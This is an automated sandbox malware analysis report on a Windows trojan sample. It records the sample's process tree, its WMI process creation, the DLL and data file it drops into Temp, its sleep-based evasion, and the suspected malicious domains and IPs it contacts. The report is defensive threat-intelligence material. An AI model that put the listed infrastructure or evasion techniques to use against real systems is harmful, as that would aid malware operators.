Play interactive tour

Edit tour

Windows Analysis Report LRios3pM39

Overview

General Information

Sample Name:	LRios3pM39 (renamed file extension from none to exe)
Analysis ID:	458972
MD5:	bbd9c29060936aa812c2b8aefb14258c
SHA1:	6fea71fbb8f46179942b99101c5b66e6801d43e6
SHA256:	469e5cd00ef10c7cdc37c647e0beca77e233ed11a5f34df087277a7ff3584a72
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Creates processes via WMI

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LRios3pM39.exe (PID: 6960 cmdline: 'C:\Users\user\Desktop\LRios3pM39.exe' MD5: BBD9C29060936AA812C2B8AEFB14258C)

conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

LRios3pM39.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\LRios3pM39.exe' -a MD5: BBD9C29060936AA812C2B8AEFB14258C)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: google.vrthcobj.com

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\sqlite.dll

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: LRios3pM39.exe	Virustotal: Detection: 21%			Perma Link
Source: LRios3pM39.exe	ReversingLabs: Detection: 57%

Source: LRios3pM39.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 172.67.146.70:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:

Binary string: D:\Administrator\Desktop\Qt5\Release\Qt5WebSockets.pdb source: LRios3pM39.exe, 00000002.00000003.660210552.0000000000658000.00000004.00000001.sdmp, sqlite.dll.2.dr

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 1948 DNS zone transfer UDP 192.168.2.4:61523 -> 34.97.69.225:53

Source: Joe Sandbox View

IP Address: 172.67.146.70 172.67.146.70

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: unknown

DNS traffic detected: queries for: a.goatgame.co

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 172.67.146.70:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\LRios3pM39.exe

Code function: 0_2_004048ED

0_2_004048ED

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sqlite.dll 7250A8A1B98D09BE823CD6EFD30D85E5418DFC3541D220BB0694DFCC547478BD

Source: LRios3pM39.exe, 00000000.00000002.648380780.00000000021F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000002.662144820.00000000020B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000000.647874488.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000002.662171088.00000000021F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000002.662159981.00000000020D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000003.660210552.0000000000658000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameQt5Gui.dll( vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000002.662179091.0000000002200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewinhttp.dll.muij% vs LRios3pM39.exe
Source: LRios3pM39.exe, 00000002.00000002.662149645.00000000020C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs LRios3pM39.exe
Source: LRios3pM39.exe	Binary or memory string: OriginalFilenameLicenseHelper.exe> vs LRios3pM39.exe

Source: LRios3pM39.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal76.winEXE@5/2@3/1

Source: C:\Users\user\Desktop\LRios3pM39.exe

Code function: 0_2_00401050 lstrcatW,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,SysAllocString,SysAllocString,SysAllocString,SysAllocString,lstrlenW,lstrlenW,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

0_2_00401050

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01

Source: C:\Users\user\Desktop\LRios3pM39.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite.dat

Jump to behavior

Source: LRios3pM39.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LRios3pM39.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\LRios3pM39.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LRios3pM39.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LRios3pM39.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\LRios3pM39.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: LRios3pM39.exe	Virustotal: Detection: 21%
Source: LRios3pM39.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\LRios3pM39.exe

File read: C:\Users\user\Desktop\LRios3pM39.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LRios3pM39.exe 'C:\Users\user\Desktop\LRios3pM39.exe'
Source: C:\Users\user\Desktop\LRios3pM39.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LRios3pM39.exe	Process created: C:\Users\user\Desktop\LRios3pM39.exe 'C:\Users\user\Desktop\LRios3pM39.exe' -a
Source: C:\Users\user\Desktop\LRios3pM39.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LRios3pM39.exe	Process created: C:\Users\user\Desktop\LRios3pM39.exe 'C:\Users\user\Desktop\LRios3pM39.exe' -a	Jump to behavior

Source: C:\Users\user\Desktop\LRios3pM39.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:

Binary string: D:\Administrator\Desktop\Qt5\Release\Qt5WebSockets.pdb source: LRios3pM39.exe, 00000002.00000003.660210552.0000000000658000.00000004.00000001.sdmp, sqlite.dll.2.dr

Source: C:\Users\user\Desktop\LRios3pM39.exe

Code function: 0_2_004018A0 LoadLibraryA,GetProcAddress,ShellExecuteExW,

0_2_004018A0

Source: C:\Users\user\Desktop\LRios3pM39.exe

Code function: 0_2_00406590 push eax; ret

0_2_004065BE

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Users\user\Desktop\LRios3pM39.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\LRios3pM39.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite.dll

Jump to dropped file

Source: C:\Users\user\Desktop\LRios3pM39.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\LRios3pM39.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite.dll

Jump to dropped file

Source: C:\Users\user\Desktop\LRios3pM39.exe TID: 7144

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\LRios3pM39.exe

Code function: 0_2_004018A0 LoadLibraryA,GetProcAddress,ShellExecuteExW,

0_2_004018A0

Source: C:\Users\user\Desktop\LRios3pM39.exe	Code function: 0_2_004053C2 SetUnhandledExceptionFilter,		0_2_004053C2
Source: C:\Users\user\Desktop\LRios3pM39.exe	Code function: 0_2_004053B0 SetUnhandledExceptionFilter,		0_2_004053B0

Source: C:\Users\user\Desktop\LRios3pM39.exe

Process created: C:\Users\user\Desktop\LRios3pM39.exe 'C:\Users\user\Desktop\LRios3pM39.exe' -a

Jump to behavior

Source: C:\Users\user\Desktop\LRios3pM39.exe

Code function: 0_2_0040267E EntryPoint,GetVersion,GetCommandLineA,

0_2_0040267E

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection11	Virtualization/Sandbox Evasion1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection11	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LRios3pM39.exe	22%	Virustotal		Browse
LRios3pM39.exe	57%	ReversingLabs	Win32.Trojan.Wacatac

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\sqlite.dll	14%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\sqlite.dll	15%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
google.vrthcobj.com	8%	Virustotal		Browse
a.goatgame.co	2%	Virustotal		Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
google.vrthcobj.com	34.97.69.225	true	true	8%, Virustotal, Browse	unknown
a.goatgame.co	172.67.146.70	true	false	2%, Virustotal, Browse	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.146.70	a.goatgame.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458972
Start date:	03.08.2021
Start time:	23:29:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LRios3pM39 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.winEXE@5/2@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 93.6%) Quality average: 79.3% Quality standard deviation: 29%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, rundll32.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 104.43.139.144 Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:30:08	API Interceptor	3x Sleep call for process: LRios3pM39.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.146.70	85d8c.exe	Get hash	malicious	Browse
	QfVER41Fwx.exe	Get hash	malicious	Browse
	O3h9kRdG7d.exe	Get hash	malicious	Browse
	1A263B2603212FF1E492D9E0C718F12601789E27EAABA.exe	Get hash	malicious	Browse
	U7HCBc2SVy.exe	Get hash	malicious	Browse
	76xAf6BYg8.exe	Get hash	malicious	Browse
	E4lwAiXNCE.exe	Get hash	malicious	Browse
	pLF8TJmHlD.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
google.vrthcobj.com	85d8c.exe	Get hash	malicious	Browse	34.97.69.225
	QfVER41Fwx.exe	Get hash	malicious	Browse	34.97.69.225
	93ejLcdBh5.exe	Get hash	malicious	Browse	34.97.69.225
	k2VFD3gNGE.exe	Get hash	malicious	Browse	34.97.69.225
	MIN56KgzBN.exe	Get hash	malicious	Browse	34.97.69.225
	U7HCBc2SVy.exe	Get hash	malicious	Browse	34.97.69.225
	TIoFSlDlv6.exe	Get hash	malicious	Browse	34.97.69.225
	76xAf6BYg8.exe	Get hash	malicious	Browse	34.97.69.225
	E4lwAiXNCE.exe	Get hash	malicious	Browse	34.97.69.225
	pLF8TJmHlD.exe	Get hash	malicious	Browse	34.97.69.225
	sonia_6.exe	Get hash	malicious	Browse	34.97.69.225
	5H4iRfY1ek.exe	Get hash	malicious	Browse	34.97.69.225
	Copy.exe	Get hash	malicious	Browse	34.97.69.225
	pMVkvSyeIy.exe	Get hash	malicious	Browse	34.97.69.225
	w7pR0EOMwd.exe	Get hash	malicious	Browse	34.97.69.225
	BoLQVCmIZB.exe	Get hash	malicious	Browse	34.97.69.225
	DhWFvSKvSb.exe	Get hash	malicious	Browse	34.97.69.225
	U2HHCJvDj4.exe	Get hash	malicious	Browse	34.97.69.225
	CLnraL1yNc.exe	Get hash	malicious	Browse	34.97.69.225
	UAD1AhRXY7.exe	Get hash	malicious	Browse	34.97.69.225
a.goatgame.co	85d8c.exe	Get hash	malicious	Browse	104.21.79.144
	85d8c.exe	Get hash	malicious	Browse	172.67.146.70
	QfVER41Fwx.exe	Get hash	malicious	Browse	172.67.146.70
	O3h9kRdG7d.exe	Get hash	malicious	Browse	172.67.146.70
	puzlXYxqKK.exe	Get hash	malicious	Browse	104.21.79.144
	k2VFD3gNGE.exe	Get hash	malicious	Browse	104.21.79.144
	MIN56KgzBN.exe	Get hash	malicious	Browse	104.21.79.144
	U7HCBc2SVy.exe	Get hash	malicious	Browse	172.67.146.70
	TIoFSlDlv6.exe	Get hash	malicious	Browse	104.21.79.144
	76xAf6BYg8.exe	Get hash	malicious	Browse	172.67.146.70
	E4lwAiXNCE.exe	Get hash	malicious	Browse	172.67.146.70
	pLF8TJmHlD.exe	Get hash	malicious	Browse	172.67.146.70
	sonia_6.exe	Get hash	malicious	Browse	104.21.79.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	State Settlement Copy.html	Get hash	malicious	Browse	172.67.75.3
	Request Quotation.exe	Get hash	malicious	Browse	172.67.188.154
	invoice.vbs	Get hash	malicious	Browse	162.159.130.233
	kKZZ0J8y0c.exe	Get hash	malicious	Browse	104.21.19.200
	RFQ 29.exe	Get hash	malicious	Browse	104.21.19.200
	ATT80307.HTM	Get hash	malicious	Browse	104.16.19.94
	2C.TA9.HTML	Get hash	malicious	Browse	104.18.11.207
	Dosusign_Na_Sign.htm	Get hash	malicious	Browse	172.67.145.176
	RoyalMail_Requestform0729.exe	Get hash	malicious	Browse	172.67.188.154
	sbcss_Richard.DeNava_#inv0549387TWQYqzTPaYeqvaYMnpdIfJAwwzbguzauViQVRRplvOktNmAire.HTM	Get hash	malicious	Browse	104.16.18.94
	Fake.HTM	Get hash	malicious	Browse	104.16.19.94
	RoyalMail_Requestform1.exe	Get hash	malicious	Browse	172.67.188.154
	Nouveau bon de commande. 3007021_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	MFS0175, MFS0117 MFS0194.exe	Get hash	malicious	Browse	172.67.188.154
	ORIGINAL PROFORMA INVOICE COAU7220898130,PDF.exe	Get hash	malicious	Browse	172.67.176.89
	Purchase Requirements.exe	Get hash	malicious	Browse	23.227.38.74
	items.doc	Get hash	malicious	Browse	104.21.19.200
	ZI09484474344.exe	Get hash	malicious	Browse	104.21.49.41
	#Ud83d#Udda8rocket.com 7335931#Ufffd90-queue-1675.htm	Get hash	malicious	Browse	104.16.19.94
	ATT66004.HTM	Get hash	malicious	Browse	104.16.19.94

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	24um7vU1BD.exe	Get hash	malicious	Browse	172.67.146.70
	JQ2bNBDOcO.exe	Get hash	malicious	Browse	172.67.146.70
	Dpwipnj1gx.exe	Get hash	malicious	Browse	172.67.146.70
	19G1ZLyqr2.exe	Get hash	malicious	Browse	172.67.146.70
	ULylDR5F36.exe	Get hash	malicious	Browse	172.67.146.70
	SecuriteInfo.com.W32.AIDetect.malware2.26285.exe	Get hash	malicious	Browse	172.67.146.70
	banload.msi	Get hash	malicious	Browse	172.67.146.70
	yQShMhZ7Hi.exe	Get hash	malicious	Browse	172.67.146.70
	zW4oE2ASRB.exe	Get hash	malicious	Browse	172.67.146.70
	run.exe	Get hash	malicious	Browse	172.67.146.70
	RNrtE1qOSL.exe	Get hash	malicious	Browse	172.67.146.70
	hDJzf1oo7U.exe	Get hash	malicious	Browse	172.67.146.70
	hpDcwMoScr.exe	Get hash	malicious	Browse	172.67.146.70
	JGJtVyC9dr.exe	Get hash	malicious	Browse	172.67.146.70
	QqcQ1EteWS.exe	Get hash	malicious	Browse	172.67.146.70
	Ya50avl5OT.exe	Get hash	malicious	Browse	172.67.146.70
	8xCetBLoAt.exe	Get hash	malicious	Browse	172.67.146.70
	7xt9iOfzN2.exe	Get hash	malicious	Browse	172.67.146.70
	5mTnLT28B7.exe	Get hash	malicious	Browse	172.67.146.70
	CknLcKyFEZ.exe	Get hash	malicious	Browse	172.67.146.70

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\sqlite.dll	CyLELjM5zk.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\sqlite.dll	setup_x86_x64_install.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\sqlite.dat Download File
Process:	C:\Users\user\Desktop\LRios3pM39.exe
File Type:	data
Category:	dropped
Size (bytes):	578665
Entropy (8bit):	7.9654565999316835
Encrypted:	false
SSDEEP:	12288:811ticqWIMMXa2ad3KNjU++VUYgokNxcg8aVg1gKtY7SQOO:YPeBaRKNjFklalbVygKtY7xx
MD5:	9C6F0C8D94B0B9761A327548F56F6256
SHA1:	E8BB880A2A8B8F40509CDE71F56F1D02CD58E03E
SHA-256:	4706A707EDEB1B676C1C396345729DCA100F1FBEAF660DAAEA442C69403DB0D3
SHA-512:	47E2A5BD6D8866CD86A0F5E38C913601092C28D0FB9CBF564C4D16C25918818E96CC303651EA7D3511716567B3E4785942FB567ACD7DB766975A53587F2DCCEE
Malicious:	false
Reputation:	low
Preview:	.<..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V...)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..jj.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2\|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i\|..y.Q'....k...}FT.X.jY..Y....o......y..=\|6..%..z/........s....>.j.-s.k../.:..........>\|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...\|/h..jfDX.S...`&...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^.......aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./

C:\Users\user\AppData\Local\Temp\sqlite.dll Download File
Process:	C:\Users\user\Desktop\LRios3pM39.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	81408
Entropy (8bit):	6.295064838876099
Encrypted:	false
SSDEEP:	1536:jkOh0YR+kfbE+2AJk64OceTbkS9Co5sWzcdSzEdY+wJpxpbcNop//:jkcjHY+fJhPN9H2SIdY+wJpxpQ8//
MD5:	05250AA12AD3C6A86DAB6DAB708D17FF
SHA1:	E41AD72C9A43070BB11FD7411800F71DDDF6BDD8
SHA-256:	7250A8A1B98D09BE823CD6EFD30D85E5418DFC3541D220BB0694DFCC547478BD
SHA-512:	A56DF11AF5243150753154E1CBA74E3CDD0CDECF09269B88A3944AC12B73DE59909CE6DBBBD3B1B6DA691D144FAC2599645B2017F66BAC64A106437168EC38C8
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 15%
Joe Sandbox View:	Filename: CyLELjM5zk.exe, Detection: malicious, Browse Filename: setup_x86_x64_install.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..f.x.5.x.5.x.5..r5.x.5..p5dx.5..q5.x.5@..4.x.5@..4.x.5@..4.x.5...5.x.5.x.5Jx.5...4.x.5...4.x.5..\|5.x.5...4.x.5Rich.x.5........................PE..L...f@.a...........!................8........................................p............@..........................&..L...<'..(....P.......................`...... ...p...................0...........@............................................text...M........................... ..`.rdata...].......^..................@..@.data........0....... ..............@....rsrc........P.......(..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	4.579085192120164
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LRios3pM39.exe
File size:	57344
MD5:	bbd9c29060936aa812c2b8aefb14258c
SHA1:	6fea71fbb8f46179942b99101c5b66e6801d43e6
SHA256:	469e5cd00ef10c7cdc37c647e0beca77e233ed11a5f34df087277a7ff3584a72
SHA512:	80d101a71f3d074be3053420158ed0d100dde722e77c6cfbbe0e462e1e5b6038e31efdb304d749b393e45de0e87dae957e39179acb9becdc609f7e0a23977ee3
SSDEEP:	768:PQR+JJlY3yGJxNojkTnJI6TWzzejkZy/xbD9BxufhqXKCljb9:TAoITdT0Zy5bZXYmljb9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../Q..N?..N?..N?.CF`..N?..l4..N?.NR1..N?..h4..N?..h5..N?.NFb..N?..N>..N?..m...N?.Rich.N?.........PE..L....E.a.................p.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40267e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x610745F4 [Mon Aug 2 01:10:12 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2cdeda7a0aa27475a825e9c41d4d95f0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00408150h
push 00403E38h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 10h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00408050h]
xor edx, edx
mov dl, ah
mov dword ptr [0040CF70h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0040CF6Ch], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0040CF68h], ecx
shr eax, 10h
mov dword ptr [0040CF64h], eax
push 00000001h
call 00007F7EE483BFCBh
pop ecx
test eax, eax
jne 00007F7EE483A8DAh
push 0000001Ch
call 00007F7EE483A980h
pop ecx
call 00007F7EE483B433h
test eax, eax
jne 00007F7EE483A8DAh
push 00000010h
call 00007F7EE483A96Fh
pop ecx
and dword ptr [ebp-04h], 00000000h
call 00007F7EE483BC73h
call dword ptr [0040804Ch]
mov dword ptr [0040D658h], eax
call 00007F7EE483BB31h
mov dword ptr [0040CF54h], eax
call 00007F7EE483B8DAh
call 00007F7EE483B81Ch
call 00007F7EE483B57Fh
mov eax, dword ptr [0040CF80h]
mov dword ptr [0040CF84h], eax
push eax
push dword ptr [0040CF78h]
push dword ptr [0040CF74h]
call 00007F7EE483A3A2h
add esp, 0Ch

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8af0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x3d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
